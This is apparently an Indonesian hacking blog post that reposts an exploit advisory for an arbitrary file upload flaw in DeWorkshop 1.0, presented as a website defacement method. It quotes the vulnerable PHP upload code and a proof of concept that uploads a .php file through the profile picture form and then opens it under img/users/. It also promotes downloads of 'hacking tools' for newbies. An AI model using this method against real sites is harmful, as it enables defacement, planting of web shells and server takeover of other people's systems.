Deface Website Metode DeWorkshop 1.0 - Arbitrary File Upload

# # # # #

# Exploit Title: DeWorkshop 1.0 - Arbitrary File Upload

# Dork: N/A

# Date: 18.08.2017

# Vendor Homepage : https://sarutech.com/

# Software Link: https://codecanyon.net/item/deworkshop-auto-workshop-portal/20336737

# Demo: https://demo.sarutech.com/deworkshop/

# Version: 1.0

# Category: Webapps

# Tested on: WiN7_x64/KaLiLinuX_x64

# CVE: N/A

# # # # #

# Exploit Author: Ihsan Sencan

# Author Web: http://ihsan.net

# Author Social: @ihsansencan

# # # # #

# Description:

# The vulnerability allows an attacker to inject sql commands and upload arbitrary file....

Baca Juga.

# Vulnerable Source:

# .....................

# $eid = $_GET["id"];

# ......

# $folder = "img/users/";

# $extention = strrchr($_FILES['bgimg']['name'], ".");

# $bgimg = $_FILES['bgimg']['name'];

# //$bgimg = $new_name.'.jpg';

# $uploaddir = $folder . $bgimg;

# move_uploaded_file($_FILES['bgimg']['tmp_name'], $uploaddir);

# .....................

# Proof of Concept:

# Customer profile picture arbitrary file can be uploaded ..

# http://localhost/[PATH]/customerupdate.php?id=1

# http://localhost/[PATH]/img/users/[FILE].php

#####

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]

Download Kumpulan Tools Hacking 100% Work

[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook ** Jack Shredder

>> Instagram ** /abdur.rozak.mw

>> Twitter ** @JackTersakiti

>> Youtube ** Pringsewu Cyber Team

>> BBM ** 57318B69

// Why So Serious...